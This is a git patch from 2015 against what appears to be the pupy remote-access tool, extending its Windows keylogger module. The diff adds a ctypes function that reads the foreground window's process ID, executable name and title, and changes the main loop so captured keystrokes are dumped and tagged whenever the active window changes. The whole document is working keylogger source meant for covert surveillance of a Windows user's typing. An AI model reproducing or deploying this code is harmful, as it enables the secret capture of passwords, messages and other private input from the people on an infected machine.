From 0edf4db9dc06588e6b6e44f3559677af571e3c08 Mon Sep 17 00:00:00 2001 From: golind Date: Fri, 23 Oct 2015 18:19:43 +0000 Subject: [PATCH] keylogger by active window For the most part this works as intended, it is a little strange when it comes to certain windows (right clickmenu for example, because there isnt a pid for it), clean up would be apreciated basically what this does logs keys based on active window and spits out the keys when the window is switched. i wasnt sure how attached you were to sleep() so I chose this method that tries not to spam too much. --- .../windows/all/pupwinutils/keylogger.py | 35 ++++++++++++++++--- 1 file changed, 31 insertions(+), 4 deletions(-) diff --git a/pupy/packages/windows/all/pupwinutils/keylogger.py b/pupy/packages/windows/all/pupwinutils/keylogger.py index 0db396f7..2c37fc70 100644 --- a/pupy/packages/windows/all/pupwinutils/keylogger.py +++ b/pupy/packages/windows/all/pupwinutils/keylogger.py @@ -24,6 +24,9 @@ kernel32 = windll.kernel32 WH_KEYBOARD_LL=13 WM_KEYDOWN=0x0100 +psapi = windll.psapi +current_window = None + keyCodes={ 0x08 : "[BKSP]", 0x09 : "[TAB]", @@ -112,11 +115,35 @@ class KeyLogger(threading.Thread): self.keys_buffer+=hooked_key return user32.CallNextHookEx(self.hooked, nCode, wParam, lParam) +#credit: Black Hat Python - https://www.nostarch.com/blackhatpython +def get_current_process(): + hwnd = user32.GetForegroundWindow() + + pid = c_ulong(0) + user32.GetWindowThreadProcessId(hwnd, byref(pid)) + + process_id = "%d" % pid.value + + executable = create_string_buffer("\x00" * 512) + h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid) + psapi.GetModuleBaseNameA(h_process,None,byref(executable),512) + + window_title = create_string_buffer("\x00" * 512) + length = user32.GetWindowTextA(hwnd, byref(window_title),512) + + kernel32.CloseHandle(hwnd) + kernel32.CloseHandle(h_process) + return "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value) + if __name__=="__main__": keyLogger = KeyLogger() keyLogger.start() while True: - time.sleep(5) - print keyLogger.dump() - - + if keyLogger.keys_buffer == "": + continue + else: + curr_proc = get_current_process() + if current_window != curr_proc: + print keyLogger.dump() + current_window = curr_proc + print current_window